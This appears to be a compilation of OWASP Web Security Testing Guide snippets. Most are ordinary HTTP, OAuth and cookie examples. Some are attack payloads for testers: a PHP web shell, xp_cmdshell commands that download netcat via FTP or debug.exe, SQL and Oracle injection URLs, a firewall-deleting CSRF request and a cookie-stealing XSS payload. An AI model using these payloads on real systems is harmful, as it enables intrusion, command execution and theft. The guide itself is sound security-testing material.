### Identify Application Entry Points: GET Request Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/06-Identify_Application_Entry_Points.md This example demonstrates a GET request to purchase an item, illustrating parameters like CUSTOMERID, ITEM, PRICE, IP, and Cookie which can serve as entry points. ```http GET /shoppingApp/buyme.asp?CUSTOMERID=100&ITEM=z101a&PRICE=62.50&IP=x.x.x.x HTTP/1.1 Host: x.x.x.x Cookie: SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbmQgcGFzc3dvcmQgaXMgYmFy ``` -------------------------------- ### Example GET Request for User Registration Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md Illustrates how user registration data might be sent via a GET request, which the application then processes. ```http https://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&email=s4tan@hell.com ``` -------------------------------- ### Example HTTP Request and Response Source: https://github.com/owasp/wstg/blob/master/template/999-Foo_Testing/3-Format_for_HTTP_Request_Response.md An example illustrating a GET request for a home page and its corresponding server response, demonstrating truncation for clarity. ```APIDOC ## Example HTTP Request and Response If the tester sends the following HTTP Request for the home page: ```http GET / HTTP/1.1 Host: localhost:8080 ``` Check if the response shows information about the server: ```http HTTP/1.1 200 [...] Apache Tomcat/10.0.4 [...] ``` In this result, the response identifies the server as Tomcat 10.0.4. ``` -------------------------------- ### Example HTTP Request Source: https://github.com/owasp/wstg/blob/master/template/999-Foo_Testing/3-Format_for_HTTP_Request_Response.md An example of a minimal HTTP GET request for a web server's root directory. This snippet illustrates the essential components required for a basic request, omitting unnecessary headers for brevity. ```http GET / HTTP/1.1 Host: localhost:8080 ``` -------------------------------- ### Example HTTP GET Request for Profile Data Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing.md Illustrates an HTTP GET request to retrieve profile data. This is a standard request that might be made by a web application. ```http GET /profile.php HTTP/1.1 Host: example.foo [...] Referer: https://example.foo/main.php Connection: keep-alive ``` -------------------------------- ### Identify Application Entry Points: POST Request Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/06-Identify_Application_Entry_Points.md This example shows a POST request for application authentication, highlighting parameters in the query string, Cookie header, and request body as potential entry points. ```http POST /example/authenticate.asp?service=login HTTP/1.1 Host: x.x.x.x Cookie: SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3RhYmxlIGNvb2tpZXMgYW5kIG1pbmUgaXMgMTIzNA==;CustomCookie=00my00trusted00ip00is00x.x.x.x00 user=admin&pass=pass123&debug=true&fromtrustIP=true ``` -------------------------------- ### Example Explanation Source: https://github.com/owasp/wstg/blob/master/template/999-Foo_Testing/3-Format_for_HTTP_Request_Response.md Explanation of the elements and techniques used in the example HTTP request and response snippet. ```APIDOC ## Example Explanation - The HTTP request and response have text describing them to the reader before the request and response. - The GET request has the smallest amount of headers to have the desired response from the server. - For example, there is no `User-Agent:` as it is not needed for the "test case". - The article uses brackets and ellipsis `[...]` to cut out unnecessary parts of the response. - Unnecessary response content for this sample includes the `Content-Type:` header and the rest of the HTML in the body. ``` -------------------------------- ### Secure Security Headers Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/14-Test_Other_HTTP_Security_Header_Misconfigurations.md This example shows a more secure configuration for common security headers, using specific origins and stricter policies. ```http Access-Control-Allow-Origin: {theallowedoriginurl} X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer ``` -------------------------------- ### GET /authorize - Authorization Code Flow with PKCE Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05-Testing_for_OAuth_Weaknesses.md Shows an example authorization request for the Authorization Code flow, including parameters specific to the PKCE extension. ```APIDOC ## GET /authorize - Authorization Code Flow with PKCE ### Description This endpoint initiates the Authorization Code flow, which is a secure way to obtain access tokens. This example includes parameters for the Proof Key for Code Exchange (PKCE) extension, enhancing security for public clients. ### Method GET ### Endpoint /authorize ### Query Parameters - **redirect_uri** (string) - Required - The redirect URI registered with the authorization server. - **client_id** (string) - Required - The client identifier. - **scope** (string) - Optional - The scope of the requested access. - **response_type** (string) - Required - Must be `code` for Authorization Code flow. - **response_mode** (string) - Optional - Specifies how the authorization response is returned (e.g., `query`). - **state** (string) - Required - An opaque value used to maintain state between the request and callback. - **nonce** (string) - Optional - A value used to associate a client session with an ID Token, and to mitigate replay attacks. - **code_challenge** (string) - Required for PKCE - The challenge generated from the code verifier. - **code_challenge_method** (string) - Required for PKCE - The method used to generate the code challenge (e.g., `S256`). ### Request Example ```http GET /authorize ?redirect_uri=https%3A%2F%2Fclient.example.com%2F &client_id=some_client_id &scope=openid%20profile%20email &response_type=code &response_mode=query &state=random_state &nonce=random_nonce &code_challenge=random_code_challenge &code_challenge_method=S256 HTTP/1.1 Host: as.example.com ``` ``` -------------------------------- ### PHP Web Shell Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files.md A simple PHP web shell that executes operating system commands passed via a GET parameter, with IP restriction. Remember to set your IP address and remove the shell after testing. ```php <?php if ($_SERVER['REMOTE_HOST'] === "FIXME") { // Set your IP address here if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); echo "<pre> "; system($cmd); echo "</pre>"; } } ?> ``` -------------------------------- ### Testing Non-Standard HTTP Port with Telnet Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Attack_Surface_Identification.md This example demonstrates using telnet to connect to a specific IP address and port (8000 in this case) and sending an HTTP GET request to confirm if an HTTP server is running on that port. ```bash telnet 192.168.10.100 8000 GET / HTTP/1.0 ``` -------------------------------- ### Example HTTP GET Request from Attacker Server Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing.md Demonstrates an HTTP GET request made by an attacker's server to serve malicious content. The `Origin` header indicates the source of the request. ```http GET /file.php HTTP/1.1 Host: attacker.bar [...] Referer: https://example.foo/main.php origin: https://example.foo ``` -------------------------------- ### robots.txt Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage.md This snippet shows a sample beginning of a robots.txt file, illustrating User-agent, Disallow, and Allow directives. ```text User-agent: * Disallow: /search Allow: /search/about Allow: /search/static Allow: /search/howsearchworks Disallow: /sdch ... ``` -------------------------------- ### Windows NT Device Namespace CD-ROM Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md Shows a specific example of referencing the Windows NT device namespace to access a CD-ROM drive. ```text \\.\CdRom0\ ``` -------------------------------- ### Valid __Host- Cookie Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes.md This example demonstrates a correctly configured __Host- prefixed cookie. It includes the Secure attribute, specifies the root path, and crucially, omits the Domain attribute. ```http Set-Cookie: __Host-SID=12345; Secure; Path=/ ``` -------------------------------- ### Example XML Database Structure Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md This is an example of an XML file used to store user data, illustrating the structure that might be targeted by XML injection attacks. ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <users> <user> <username>gandalf</username> <password>!c3</password> <userid>0</userid> <mail>gandalf@middleearth.com</mail> </user> <user> <username>Stefan0</username> <password>w1s3c</password> <userid>500</userid> <mail>Stefan0@whysec.hmm</mail> </user> </users> ``` -------------------------------- ### String Concatenation Examples Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md Demonstrates different string concatenation techniques used in various SQL dialects for testing purposes. ```SQL ‘test’ + ‘ing’ ``` ```SQL ‘test’ ‘ing’ ``` ```SQL ‘test’||’ing’ ``` -------------------------------- ### Secure Cookie Prefix Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes.md This example shows a cookie using the __Secure- prefix. It adheres to the requirements of having the Secure attribute set and being set from a secure URI. ```http Set-Cookie: __Secure-Session=12345; Secure ``` -------------------------------- ### PHP Code Example with String Replacement Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md Illustrates a common but flawed approach in PHP where user input is processed by replacing characters before being used as a filename. This example is prone to bypasses. ```php filename = Request.QueryString("file"); Replace(filename, "/","\"); Replace(filename, "..\",""); ``` -------------------------------- ### HTTP Parameter Pollution Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/10-Test-Payment-Functionality.md This example demonstrates how HTTP Parameter Pollution can be exploited to manipulate basket quantities by sending duplicate parameters in a POST request. ```http POST /api/basket/add Host: example.org item_id=1&quantity=5&quantity=4 ``` -------------------------------- ### JSON API Response Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md This JSON example shows a typical API response containing user profile details. Analyze such responses for potentially sensitive fields like 'isAdmin' that could be exploited through mass assignment. ```json {"_id":12345,"username":"bob","age":38,"email":"bob@domain.test","isAdmin":false} ``` -------------------------------- ### Example HTTP Response Source: https://github.com/owasp/wstg/blob/master/template/999-Foo_Testing/3-Format_for_HTTP_Request_Response.md A sample HTTP response indicating a successful request (200 OK) and revealing server information. The example uses brackets and ellipsis to denote truncated content, focusing on the relevant parts like the server identification. ```http HTTP/1.1 200 [...] <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>Apache Tomcat/10.0.4 [...] ``` -------------------------------- ### CONNECT Method Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md Demonstrates a CONNECT request to establish a TCP connection to another system. This can be used for proxying traffic. ```http CONNECT 192.168.0.1:443 HTTP/1.1 Host: example.org ``` -------------------------------- ### Executing Arbitrary SQL with EXECUTE IMMEDIATE Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md This URL shows how to use 'EXECUTE IMMEDIATE :1' to run arbitrary SQL statements, including DML and DDL. ```url https://server.example.com/pls/dad/orasso.home?);execute%20immediate%20:1;--=select%201%20from%20dual ``` -------------------------------- ### Example Telnet Output for HTTP Server Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Attack_Surface_Identification.md This is an example of the output received when an HTTP server responds to a GET request on a non-standard port, confirming the service type and version. ```text HTTP/1.0 200 OK pragma: no-cache Content-Type: text/html Server: MX4J-HTTPD/1.0 expires: now Cache-Control: no-cache <html> ... ``` -------------------------------- ### Windows UNC Filepath Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md Demonstrates the format for Windows Universal Naming Convention (UNC) filepaths, used to reference files on SMB shares. ```text \\server_or_ip\path\to\file.abc ``` -------------------------------- ### GET Request for Deleting All Firewall Rules Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.md This example demonstrates a dangerous GET request that deletes all firewall rules. If a user is logged into the management console, an attacker could exploit this by embedding this URL in a way that the user's browser automatically requests it. ```url https://[target]/fwmgt/delete?rule=* ``` -------------------------------- ### Windows NT Device Namespace Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md Illustrates how to reference the Windows device namespace, which can allow access to file systems using alternative paths. ```text \\.\GLOBALROOT\Device\HarddiskVolume1\ ``` -------------------------------- ### GET Request for Deleting Firewall Rule Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.md This example shows a simple GET request URL that could be used to delete a specific firewall rule. An attacker could craft a link or embed this URL in an image tag to trick a logged-in user into executing this command. ```url https://[target]/fwmgt/delete?rule=1 ``` -------------------------------- ### Project Folder Structure Example Source: https://github.com/owasp/wstg/blob/master/style_guide.md Illustrates the recommended directory structure for organizing articles and images within the WSTG project. Place images in an 'images/' folder within the article's directory. ```sh document/ ├───0_Foreword/ │ └───0_Foreword.md ├───1_Frontispiece/ │ ├───images/ │ │ └───example.jpg │ └───1_Frontispiece.md ├───2_Introduction/ │ ├───images/ │ │ └───example.jpg │ └───2_Introduction.md ├───3_The_OWASP_Testing_Framework/ │ ├───images/ │ │ └───example.jpg │ └───3_The_OWASP_Testing_Framework.md ├───4_Web_Application_Security_Testing/ │ ├───4.1_Introduction_and_Objectives/ │ │ └───4.1_Testing_Introduction_and_Objectives.md │ ├───4.2_Information_Gathering/ │ │ ├───images/ │ │ │ └───example.jpg │ │ ├───4.2_Testing_Information_Gathering.md │ │ └───4.2.1_Conduct_Search_Engine_Discovery.md ``` -------------------------------- ### Upload Executable via FTP using xp_cmdshell Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md This snippet demonstrates how to upload an executable (e.g., netcat.exe) to a target SQL Server using FTP and the xp_cmdshell command. Ensure the target server can initiate FTP connections to the tester's machine. ```sql exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';-- ``` ```sql exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-- ``` ```sql exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';-- ``` ```sql exec master..xp_cmdshell 'echo bin >> ftpscript.txt';-- ``` ```sql exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';-- ``` ```sql exec master..xp_cmdshell 'echo quit >> ftpscript.txt';-- ``` ```sql exec master..xp_cmdshell 'ftp -s:ftpscript.txt';-- ``` -------------------------------- ### POST Request Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/04-Testing_for_Exposed_Session_Variables.md This snippet shows a typical POST request containing session information. Ensure server-side code does not accept this data if sent via GET. ```http POST /login.asp HTTP/1.1 Host: owaspapp.com ... Cookie: ASPSESSIONIDABCDEFG=ASKLJDLKJRELKHJG Content-Length: 51 Login=Username&password=Password&SessionID=12345678 ``` -------------------------------- ### Identify Implicit Flow via Response Type in Authorization Request Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05-Testing_for_OAuth_Weaknesses.md This example shows how to detect the Implicit Flow by checking the 'response_type' parameter in a GET request to the /authorize endpoint. The token is directly returned in the response. ```http GET /authorize ?client_id=<some_client_id> &response_type=token &redirect_uri=https%3A%2F%2Fclient.example.com%2F &scope=openid%20profile%20email &state=<random_state> ``` -------------------------------- ### Flask/Jinja2 SSTI Vulnerability in Python Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md This Python example using Flask and Jinja2 shows how directly rendering user input (`name`) from a GET request within a Jinja2 template string can lead to SSTI and XSS vulnerabilities. ```python @app.route("/page") def page(): name = request.values.get('name') output = Jinja2.from_string('Hello ' + name + '!').render() return output ``` -------------------------------- ### Upload Executable via Debugger Script using xp_cmdshell Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md This snippet shows how to upload an executable by converting it into a debug script, uploading the script line by line, and then executing it with debug.exe. This is a workaround when FTP is blocked by the firewall. ```sql exec master..xp_cmdshell 'echo [debug script line #1 of n] > debugscript.txt';-- ``` ```sql exec master..xp_cmdshell 'echo [debug script line #2 of n] >> debugscript.txt';-- ``` ```sql exec master..xp_cmdshell 'echo [debug script line #n of n] >> debugscript.txt';-- ``` ```sql exec master..xp_cmdshell 'debug.exe < debugscript.txt';-- ``` -------------------------------- ### Injecting HTP.PRINT for Output Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md This URL shows how to use HTP.PRINT to output data and add a required bind variable, enabling basic command execution. ```url https://server.example.com/pls/dad/orasso.home?);HTP.PRINT(:1);--=BAR ``` -------------------------------- ### Malicious CORS Payload Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing/06-Testing_for_Client-side_Resource_Manipulation.md An example of a malicious server-side response that enables CORS for a target domain and executes an XSS payload. ```php <?php header('Access-Control-Allow-Origin: https://www.victim.com'); ?> <script>alert(document.cookie);</script> ``` -------------------------------- ### Stacked Query Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md Demonstrates how to execute multiple SQL queries in a single call by appending a new query to the original. This can be used to perform actions like inserting data into other tables. ```SQL SELECT * FROM products WHERE id_product=$id_product ``` ```URL https://www.example.com/product.php?id=10; INSERT INTO users (…) ``` -------------------------------- ### Inspect Multiple Framework Indicators in HTTP Headers Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework.md This example shows how to analyze HTTP response headers, including 'X-Powered-By' and 'X-Generator', to identify the underlying web framework. It highlights that multiple headers might be needed for accurate fingerprinting, as 'X-Powered-By' can be misleading. ```http HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Sat, 07 Sep 2013 09:22:52 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.4.16-1~dotdeb.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Generator: Swiftlet ``` -------------------------------- ### Overly Permissive Security Headers Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/14-Test_Other_HTTP_Security_Header_Misconfigurations.md This example demonstrates a configuration of security headers that might be too permissive, potentially exposing the application to risks. ```http Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true X-Permitted-Cross-Domain-Policies: all Referrer-Policy: unsafe-url ``` -------------------------------- ### Searching Certificate Transparency Logs via crt.sh Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Attack_Surface_Identification.md This URL is an example of how to query the crt.sh Certificate Transparency log search portal. It searches for all certificates issued for subdomains of 'example.com' using a wildcard pattern. ```http https://crt.sh/?q=%25.example.com ``` -------------------------------- ### Test BFLA: GET Request for Admin Data Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/12-API_Testing/04-API_Broken_Function_Level_Authorization.md Attempt to retrieve information that should only be accessible to high-privilege users, such as administrators, using a GET request. ```http GET /api/admin/getAllUsers ``` -------------------------------- ### Download and Display security.txt Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage.md This snippet demonstrates how to download the security.txt file from a web server using wget and then display its content. It's useful for quickly inspecting the security policy and contact information published by a website. ```bash $ wget --no-verbose https://www.linkedin.com/.well-known/security.txt && cat security.txt 2020-05-07 12:56:51 URL:https://www.linkedin.com/.well-known/security.txt [333/333] -> "security.txt" [1] # Conforms to IETF `draft-foudil-securitytxt-07` Contact: mailto:security@linkedin.com Contact: https://www.linkedin.com/help/linkedin/answer/62924 Encryption: https://www.linkedin.com/help/linkedin/answer/79676 Canonical: https://www.linkedin.com/.well-known/security.txt Policy: https://www.linkedin.com/help/linkedin/answer/62924 ``` -------------------------------- ### Basic DOM-based XSS Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md A simple example where a message parameter from the URL is reflected directly into the document, potentially leading to XSS if not properly sanitized. ```html <script> var pos=document.URL.indexOf("message=")+5; document.write(document.URL.substring(pos,document.URL.length)); </script> ``` -------------------------------- ### Discover Supported HTTP Methods with OPTIONS Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md Use an OPTIONS request to identify the HTTP methods supported by a web server. The server's response should list the allowed methods. ```http OPTIONS / HTTP/1.1 Host: example.org ``` ```http HTTP/1.1 200 OK Allow: OPTIONS, GET, HEAD, POST ``` -------------------------------- ### wfuzz Example Output Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.md Sample output from wfuzz demonstrating responses to injected payloads. Status codes like 500 indicate potential vulnerabilities, while 200 may indicate successful sanitization or no impact. ```text ID Response Lines Word Chars Payload =================================================================== 000000002: 500 0 L 5 W 142 Ch "%25s%25s%25s%25n" 000000003: 500 0 L 5 W 137 Ch "%25p%25p%25p%25p%25p" 000000004: 200 0 L 1 W 48 Ch "%7Bevent.__init__.__globals__%5BCONFIG%5D%5BSECRET_KEY%5D%7D" 000000001: 200 0 L 1 W 5 Ch "alice" ``` -------------------------------- ### SQL Injection via GET Request Payload Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md A payload designed for SQL injection in a GET request, aiming to extract source code by executing master.dbo.xp_cmdshell. ```sql a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';-- ``` -------------------------------- ### HTML Input Field Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md This HTML snippet demonstrates the bracket syntax for input parameter names, which can be an indicator of potential mass assignment vulnerabilities. When encountered, try adding non-existing attributes to test for improper handling. ```html <input name="user[name]" type="text"> ``` -------------------------------- ### Amazon S3 Path-Style URL Example Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/11-Test_Cloud_Storage.md Example of a path-style URL for accessing an object in an Amazon S3 bucket, including region, bucket name, and key name. ```text https://s3.us-west-2.amazonaws.com/my-bucket/puppy.png ``` -------------------------------- ### Boolean Exploitation Example Request Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md An example of a URL request that could trigger a syntactic error due to SQL injection, used in boolean-based exploitation techniques to infer database information. ```http https://www.example.com/index.php?id=1' ``` -------------------------------- ### Attempt DNS Zone Transfer using 'host' command Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Attack_Surface_Identification.md This example shows an attempt to perform a DNS zone transfer from a specified name server for a given domain using the 'host' command. It illustrates a common scenario where zone transfers are often refused. ```bash $ host -l www.owasp.org ns1.secure.net Using domain server: Name: ns1.secure.net Address: 192.220.124.10#53 Aliases: Host www.owasp.org not found: 5(REFUSED) ; Transfer failed. ```